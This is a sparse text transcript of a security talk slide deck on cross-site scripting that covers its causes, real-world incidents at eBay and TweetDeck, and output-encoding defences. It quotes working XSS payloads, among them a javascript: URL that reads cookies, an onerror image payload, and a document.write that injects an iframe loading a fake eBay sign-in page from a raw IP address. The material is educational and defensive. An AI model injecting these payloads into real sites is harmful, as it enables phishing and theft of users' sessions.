Cross Site Scripting Going Beyond the Alert Box
-
Upload
aaron-weaver -
Category
Internet
-
view
327 -
download
0
Transcript of Cross Site Scripting Going Beyond the Alert Box
![Page 1: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/1.jpg)
Alert(‘xss’)
![Page 2: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/2.jpg)
OWASPowasp.org
![Page 3: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/3.jpg)
![Page 4: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/4.jpg)
XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.
![Page 5: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/5.jpg)
![Page 6: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/6.jpg)
![Page 7: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/7.jpg)
Caused by an application that:
● Fails to properly validate untrusted data.
● Fails to properly encode output data.
![Page 8: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/8.jpg)
Generally an attack against an application’s users, not an application.
![Page 9: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/9.jpg)
![Page 10: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/10.jpg)
Source: http://excess-xss.com/
![Page 11: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/11.jpg)
Source: http://excess-xss.com/
![Page 12: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/12.jpg)
Source: http://excess-xss.com/
![Page 13: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/13.jpg)
Source: http://excess-xss.com/
![Page 14: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/14.jpg)
Source: http://excess-xss.com/
![Page 15: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/15.jpg)
![Page 16: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/16.jpg)
![Page 17: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/17.jpg)
![Page 18: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/18.jpg)
http://ebay.com/link/?nav=webview&url=javascript:
alert(document.cookie)
Note: XSS doesn’t always need a <script> tag to execute.
![Page 19: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/19.jpg)
Bonus Points: What is missing on eBay’s cookies?
![Page 20: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/20.jpg)
![Page 21: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/21.jpg)
document.write(‘<iframe src=”http://45.55.162.179/ebay/signin.
ebay.com/ws/eBayISAPI9f90.html” width=”1500″
height=”1000″>’)
![Page 23: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/23.jpg)
![Page 24: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/24.jpg)
Set to automatically retweet via this: data-action:retweet causing a chain event for anyone that logs into TweetDeck.
![Page 25: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/25.jpg)
![Page 26: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/26.jpg)
https://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html
![Page 27: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/27.jpg)
![Page 28: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/28.jpg)
![Page 29: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/29.jpg)
https://xss-doc.appspot.com/demo/3#'><img src=x onerror=alert(/DOM-XSS/)>
https://xss-doc.appspot.com/demo/3#'><img src=x onerror=alert(/DOM-XSS/)>
https://www.google.com/about/appsecurity/learning/xss/
![Page 30: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/30.jpg)
![Page 31: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/31.jpg)
![Page 32: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/32.jpg)
![Page 33: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/33.jpg)
![Page 34: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/34.jpg)
![Page 35: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/35.jpg)
![Page 36: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/36.jpg)
![Page 37: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/37.jpg)
![Page 38: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/38.jpg)
![Page 39: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/39.jpg)
![Page 40: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/40.jpg)
![Page 41: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/41.jpg)
![Page 42: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/42.jpg)
![Page 43: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/43.jpg)
![Page 44: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/44.jpg)
![Page 45: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/45.jpg)
![Page 46: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/46.jpg)
http://gauntlt.org/
![Page 47: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/47.jpg)
![Page 48: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/48.jpg)
https://github.com/gauntlt
![Page 49: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/49.jpg)
![Page 50: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/50.jpg)
DevOps with Pipeline
![Page 51: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/51.jpg)
![Page 52: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/52.jpg)
![Page 53: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/53.jpg)
![Page 55: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/55.jpg)
![Page 56: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/56.jpg)
![Page 57: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/57.jpg)
![Page 58: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/58.jpg)
![Page 59: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/59.jpg)
○○
<%= h foo.bar %>
Server.HtmlEncode(string)
● https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet● https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
![Page 60: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/60.jpg)
![Page 61: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/61.jpg)
![Page 62: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/62.jpg)
![Page 63: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/63.jpg)
![Page 64: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/64.jpg)
![Page 65: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/65.jpg)
![Page 66: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/66.jpg)
![Page 67: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/67.jpg)
![Page 68: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/68.jpg)
![Page 69: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/69.jpg)
![Page 70: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/70.jpg)
![Page 71: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/71.jpg)